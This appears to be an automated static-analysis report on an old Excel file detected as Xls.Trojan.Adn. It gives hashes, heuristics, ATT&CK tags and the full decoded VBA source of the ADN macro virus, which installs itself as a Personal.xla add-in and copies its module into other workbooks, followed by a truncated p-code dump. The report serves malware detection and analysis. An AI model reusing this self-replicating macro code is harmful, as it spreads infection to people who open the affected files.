Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc45ea2c2222c321…

MALICIOUS

Office (OLE)

23.5 KB Created: 2000-12-06 20:55:44 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 67e61229b13b971942d890c77d37f3ee SHA-1: c21184ea9376f92543decda9caca0432903fb4fa SHA-256: fc45ea2c2222c3219ee9eeb7e01f889b53bab33488da91cbee7c4cc405557afa
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, specifically an Auto_Open macro, which is a common technique for executing malicious code upon opening. The script attempts to save a file named 'Personal.xla' to the application's path, likely to establish persistence or download further payloads. The ClamAV detection further confirms its malicious nature.

Heuristics 3

  • ClamAV: Xls.Trojan.Adn-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Adn-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8424 bytes
SHA-256: 5a6ca30fb56986ec4818db1f92c140d2aa6a1b7eab0555c75d9958e05c9b419c
Detection
ClamAV: Xls.Trojan.Adn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "X316"
' Spalaci Label is Pac
' ADN Virus - (C) Copyright 1999/2000
Public Indexe As String

Private Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
For i = 1 To ThisWorkbook.VBProject.VBComponents.Count
    Cadena = ThisWorkbook.VBProject.VBComponents(i).Name
    Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
    Fusion = (Letras & Val(Numero))
    If Cadena = Fusion Then
       Indexe = ThisWorkbook.VBProject.VBComponents(i).Name
    End If
Next
Application.OnSheetActivate = "ClassModulo"
End Sub

Private Sub ClassModulo()
Attribute ClassModulo.VB_ProcData.VB_Invoke_Func = " \n14"
    Randomize: install = 0
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    Intr = Int((Rnd * 1000) + 1)
    Iltr = Int((90 - 65 + 1) * Rnd + 65)
    Play = (Chr(Iltr) & Intr)
    If ThisWorkbook.Name <> "Personal.xla" Then
       If Dir(Application.Path + "\Personal.xla") = "Personal.xla" Then install = 1
       If install = 0 Then
          Workbooks.Add.SaveAs FileName:=Application.Path + "\Personal.xla"
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents.Import (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents(Indexe).Name = Play
          Workbooks("Personal.xla").IsAddin = True
          Workbooks("Personal.xla").Save
          AddIns.Add(Application.Path + "\Personal.xla").Installed = True
       End If
    Else
       For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
           Cadena = ActiveWorkbook.VBProject.VBComponents(i).Name
           Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
           Fusion = (Letras & Val(Numero))
           If Cadena = Fusion Then install = 1
       Next
       If install = 0 Then
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          ActiveWorkbook.VBProject.VBComponents.Import (Indexe)
          ActiveWorkbook.VBProject.VBComponents(Indexe).Name = Play
       End If
    End If
    If Day(Now()) = Int((31 * Rnd) + 1) Then
       Application.Caption = "Spalaci.Label.Is.Pac"
       Application.CommandBars.LargeButtons = True
    End If
    Application.DisplayAlerts = True
    Application.ScreenUpdating = True
End Sub


' Processing file: /opt/analyzer/scan_staging/a0c02223c71b4b69825cf655ae9cfabb.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 965 bytes
' _VBA_PROJECT_CUR/VBA/Hoja1 - 956 bytes
' _VBA_PROJECT_CUR/VBA/X316 - 3847 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0015 " Spalaci Label is Pac"
' Line #1:
' 	QuoteRem 0x0000 0x0024 " ADN Virus - (C) Copyright 1999/2000"
' Line #2:
' 	Dim (Public) 
' 	VarDefn Indexe (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub auto_open())
' Line #5:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #6:
' 	Ld i 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Cadena 
' Line #7:
' 	Ld Cadena 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	St Letras 
' 	BoS 0x0000 
' 	Ld Cadena 
' 	Ld Cadena 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Right 0x0002 
' 	St Numero 
' Line #8:
' 	Ld Letras 
' 	Ld Numero 
' 	ArgsLd Val 0x0001 
' 	Concat 
' 	Paren 
' 	St Fusion 
' Line #9:
' 	Ld Cadena 
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.